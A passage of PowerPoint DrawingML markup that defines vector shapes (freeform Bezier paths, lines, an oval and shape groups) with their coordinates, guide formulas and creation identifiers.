                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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72549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50" name="Freeform 825">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A12F6B7-A61E-40C5-892F-AD650A337BA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158" y="1323"/>
                  <a:ext cx="419" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119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72549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51" name="Freeform 826">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4C1FE1-CD51-40F3-9F83-6A1A05B6C09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52" y="1304"/>
                  <a:ext cx="109" cy="69"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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52" name="Oval 827">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172A3E09-D88B-4834-A70B-F1A352FAA6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flipH="1">
                  <a:off x="2239" y="1204"/>
                  <a:ext cx="145" cy="145"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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89" name="Group 764">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3979EC4A-7860-460A-9571-59CED7EE8C8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8663197" y="1122245"/>
              <a:ext cx="457200" cy="438150"/>
              <a:chOff x="2210" y="1518"/>
              <a:chExt cx="1345" cy="1285"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2132" name="Freeform 765">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E2EF08-4432-4384-98B1-BD7E849D3151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210" y="1518"/>
                <a:ext cx="1345" cy="1285"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T1" fmla="*/ 359 h 1285"/>
                  <a:gd name="T2" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 0 w 1345"/>
                  <a:gd name="T5" fmla="*/ 923 h 1285"/>
                  <a:gd name="T6" fmla="*/ 0 w 1345"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T9" fmla="*/ 359 h 1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5" h="1285">
                    <a:moveTo>
                      <a:pt x="1345" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1345" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="3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33" name="Freeform 766">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967CA9DA-A974-423C-8E92-F5EFB9459174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3141" y="2283"/>
                <a:ext cx="234" cy="383"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 234 w 234"/>
                  <a:gd name="T1" fmla="*/ 62 h 383"/>
                  <a:gd name="T2" fmla="*/ 234 w 234"/>
                  <a:gd name="T3" fmla="*/ 383 h 383"/>
                  <a:gd name="T4" fmla="*/ 0 w 234"/>
                  <a:gd name="T5" fmla="*/ 321 h 383"/>
                  <a:gd name="T6" fmla="*/ 0 w 234"/>
                  <a:gd name="T7" fmla="*/ 0 h 383"/>
                  <a:gd name="T8" fmla="*/ 234 w 234"/>
                  <a:gd name="T9" fmla="*/ 62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4" h="383">
                    <a:moveTo>
                      <a:pt x="234" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="234" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="62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C080C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34" name="Freeform 767">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A644DBB-68F3-4AEB-8E39-03C462CD4922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3196" y="2361"/>
                <a:ext cx="118" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 118 w 118"/>
                  <a:gd name="T1" fmla="*/ 59 h 59"/>
                  <a:gd name="T2" fmla="*/ 118 w 118"/>
                  <a:gd name="T3" fmla="*/ 31 h 59"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 59"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 26 h 59"/>
                  <a:gd name="T8" fmla="*/ 118 w 118"/>
                  <a:gd name="T9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" h="59">
                    <a:moveTo>
                      <a:pt x="118" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="118" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="59"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0C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35" name="Freeform 768">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9720B1CD-8DCD-4641-B8F2-DF81E674EE5A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3141" y="1867"/>
                <a:ext cx="234" cy="383"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 234 w 234"/>
                  <a:gd name="T1" fmla="*/ 62 h 383"/>
                  <a:gd name="T2" fmla="*/ 234 w 234"/>
                  <a:gd name="T3" fmla="*/ 383 h 383"/>
                  <a:gd name="T4" fmla="*/ 0 w 234"/>
                  <a:gd name="T5" fmla="*/ 322 h 383"/>
                  <a:gd name="T6" fmla="*/ 0 w 234"/>
                  <a:gd name="T7" fmla="*/ 0 h 383"/>
                  <a:gd name="T8" fmla="*/ 234 w 234"/>
                  <a:gd name="T9" fmla="*/ 62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4" h="383">
                    <a:moveTo>
                      <a:pt x="234" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="234" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="62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C080C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36" name="Freeform 769">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78B7626-BE89-43B1-8A0A-935947B8BE27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3196" y="1945"/>
                <a:ext cx="118" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 118 w 118"/>
                  <a:gd name="T1" fmla="*/ 59 h 59"/>
                  <a:gd name="T2" fmla="*/ 118 w 118"/>
                  <a:gd name="T3" fmla="*/ 31 h 59"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 59"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 26 h 59"/>
                  <a:gd name="T8" fmla="*/ 118 w 118"/>
                  <a:gd name="T9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" h="59">
                    <a:moveTo>
                      <a:pt x="118" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="118" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="59"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0C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37" name="Line 770">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7692DC4C-2090-4761-BBBE-722D7817079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gray">
              <a:xfrm>
                <a:off x="2787" y="1955"/>
                <a:ext cx="111" cy="31"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="158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38" name="Freeform 771">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE2752A-BDB1-468F-83A5-9F6272934643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895" y="1952"/>
                <a:ext cx="64" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 64"/>
                  <a:gd name="T1" fmla="*/ 67 h 67"/>
                  <a:gd name="T2" fmla="*/ 64 w 64"/>
                  <a:gd name="T3" fmla="*/ 50 h 67"/>
                  <a:gd name="T4" fmla="*/ 0 w 64"/>
                  <a:gd name="T5" fmla="*/ 0 h 67"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7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4" h="67">
                    <a:moveTo>
                      <a:pt x="0" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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000000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39" name="Line 772">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A301E6-184C-49E0-B288-EEF178647B4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gray">
              <a:xfrm>
                <a:off x="2787" y="2404"/>
                <a:ext cx="111" cy="30"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="158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40" name="Freeform 773">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA59F6DB-5F7D-4B79-AC9D-13339F389C35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895" y="2401"/>
                <a:ext cx="64" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 64"/>
                  <a:gd name="T1" fmla="*/ 66 h 66"/>
                  <a:gd name="T2" fmla="*/ 64 w 64"/>
                  <a:gd name="T3" fmla="*/ 50 h 66"/>
                  <a:gd name="T4" fmla="*/ 0 w 64"/>
                  <a:gd name="T5" fmla="*/ 0 h 66"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T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4" h="66">
                    <a:moveTo>
                      <a:pt x="0" y="66"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0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000000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41" name="Freeform 774">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D0D822-43EA-4FE2-B7AA-D84444964F38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368" y="2245"/>
                <a:ext cx="251" cy="232"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 106"/>
                  <a:gd name="T1" fmla="*/ 62 h 98"/>
                  <a:gd name="T2" fmla="*/ 8 w 106"/>
                  <a:gd name="T3" fmla="*/ 72 h 98"/>
                  <a:gd name="T4" fmla="*/ 98 w 106"/>
                  <a:gd name="T5" fmla="*/ 96 h 98"/>
                  <a:gd name="T6" fmla="*/ 105 w 106"/>
                  <a:gd name="T7" fmla="*/ 91 h 98"/>
                  <a:gd name="T8" fmla="*/ 106 w 106"/>
                  <a:gd name="T9" fmla="*/ 36 h 98"/>
                  <a:gd name="T10" fmla="*/ 98 w 106"/>
                  <a:gd name="T11" fmla="*/ 26 h 98"/>
                  <a:gd name="T12" fmla="*/ 8 w 106"/>
                  <a:gd name="T13" fmla="*/ 2 h 98"/>
                  <a:gd name="T14" fmla="*/ 0 w 106"/>
                  <a:gd name="T15" fmla="*/ 7 h 98"/>
                  <a:gd name="T16" fmla="*/ 0 w 106"/>
                  <a:gd name="T17" fmla="*/ 62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" h="98">
                    <a:moveTo>
                      <a:pt x="0" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="67"/>
                      <a:pt x="3" y="71"/>
                      <a:pt x="8" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="72"/>
                      <a:pt x="8" y="72"/>
                      <a:pt x="98" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="98"/>
                      <a:pt x="105" y="95"/>
                      <a:pt x="105" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="91"/>
                      <a:pt x="105" y="91"/>
                      <a:pt x="106" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="31"/>
                      <a:pt x="102" y="27"/>
                      <a:pt x="98" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="26"/>
                      <a:pt x="98" y="26"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="0" y="3"/>
                      <a:pt x="0" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="46"/>
                      <a:pt x="0" y="6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42" name="Freeform 775">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23FB5B0C-CF33-44DE-BE07-24631F9B2790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418" y="2113"/>
                <a:ext cx="154" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 65"/>
                  <a:gd name="T1" fmla="*/ 61 h 66"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 24 h 66"/>
                  <a:gd name="T4" fmla="*/ 33 w 65"/>
                  <a:gd name="T5" fmla="*/ 5 h 66"/>
                  <a:gd name="T6" fmla="*/ 65 w 65"/>
                  <a:gd name="T7" fmla="*/ 41 h 66"/>
                  <a:gd name="T8" fmla="*/ 32 w 65"/>
                  <a:gd name="T9" fmla="*/ 6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66">
                    <a:moveTo>
                      <a:pt x="32" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="56"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="0" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="9"/>
                      <a:pt x="15" y="0"/>
                      <a:pt x="33" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="10"/>
                      <a:pt x="65" y="26"/>
                      <a:pt x="65" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="57"/>
                      <a:pt x="50" y="66"/>
                      <a:pt x="32" y="6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43" name="Freeform 776">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01384F4E-2996-40EB-9175-4BDF3D8EE248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368" y="1813"/>
                <a:ext cx="251" cy="229"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 106"/>
                  <a:gd name="T1" fmla="*/ 62 h 97"/>
                  <a:gd name="T2" fmla="*/ 8 w 106"/>
                  <a:gd name="T3" fmla="*/ 72 h 97"/>
                  <a:gd name="T4" fmla="*/ 98 w 106"/>
                  <a:gd name="T5" fmla="*/ 96 h 97"/>
                  <a:gd name="T6" fmla="*/ 105 w 106"/>
                  <a:gd name="T7" fmla="*/ 90 h 97"/>
                  <a:gd name="T8" fmla="*/ 106 w 106"/>
                  <a:gd name="T9" fmla="*/ 35 h 97"/>
                  <a:gd name="T10" fmla="*/ 98 w 106"/>
                  <a:gd name="T11" fmla="*/ 25 h 97"/>
                  <a:gd name="T12" fmla="*/ 8 w 106"/>
                  <a:gd name="T13" fmla="*/ 1 h 97"/>
                  <a:gd name="T14" fmla="*/ 0 w 106"/>
                  <a:gd name="T15" fmla="*/ 7 h 97"/>
                  <a:gd name="T16" fmla="*/ 0 w 106"/>
                  <a:gd name="T17" fmla="*/ 62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" h="97">
                    <a:moveTo>
                      <a:pt x="0" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="66"/>
                      <a:pt x="3" y="71"/>
                      <a:pt x="8" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
